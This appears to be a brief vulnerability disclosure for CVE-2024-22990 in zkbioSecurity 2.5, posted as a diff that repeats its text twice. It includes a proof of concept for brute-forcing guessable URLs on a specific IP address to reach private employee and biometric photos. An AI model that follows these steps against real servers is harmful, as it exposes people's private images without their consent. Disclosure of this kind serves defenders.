whiteman007 · March 1, 2024 09:47
diff --git a/CVE-2024-22990 b/CVE-2024-22990
 CVE ID: CVE-2024-22990
 Vendor of Product: zkbioSecurity - 2.5
 Description: Allowing unauthorized access to sensitive images without proper security permissions. The vulnerability manifests when a site administrator adds a user or an employee captures their picture. Subsequently, any attacker can view all images by guessing the image URLs, circumventing security measures.
 Vulnerability Type: misconfiguration
 Severity: High

 poc 
 > [Attack Vectors]
 > can any attacker show and download private images admin and employe but get the path
 > 1-go to http://58.23.12.98:5888/ the demo
 > 2-http://58.23.12.98:5888/auth_files/biophoto/40/ the path
 > 3-brute force to find the name images im find imgs 1.jpg
 > 4-you can show the images http://58.23.12.98:5888/auth_files/biophoto/40/1.jpg
 > http://58.23.12.98:5888/auth_files/photo/40/1.jpg
 > the exploit can use by hacker to leak database or leaks images users
 >
	CVE ID: CVE-2024-22990
	Vendor of Product: zkbioSecurity - 2.5
	Description: Allowing unauthorized access to sensitive images without proper security permissions. The vulnerability manifests when a site administrator adds a user or an employee captures their picture. Subsequently, any attacker can view all images by guessing the image URLs, circumventing security measures.
	Vulnerability Type: misconfiguration
	Severity: High

	poc
	> [Attack Vectors]
	> can any attacker show and download private images admin and employe but get the path
	> 1-go to http://58.23.12.98:5888/ the demo
	> 2-http://58.23.12.98:5888/auth_files/biophoto/40/ the path
	> 3-brute force to find the name images im find imgs 1.jpg
	> 4-you can show the images http://58.23.12.98:5888/auth_files/biophoto/40/1.jpg
	> http://58.23.12.98:5888/auth_files/photo/40/1.jpg
	> the exploit can use by hacker to leak database or leaks images users
	>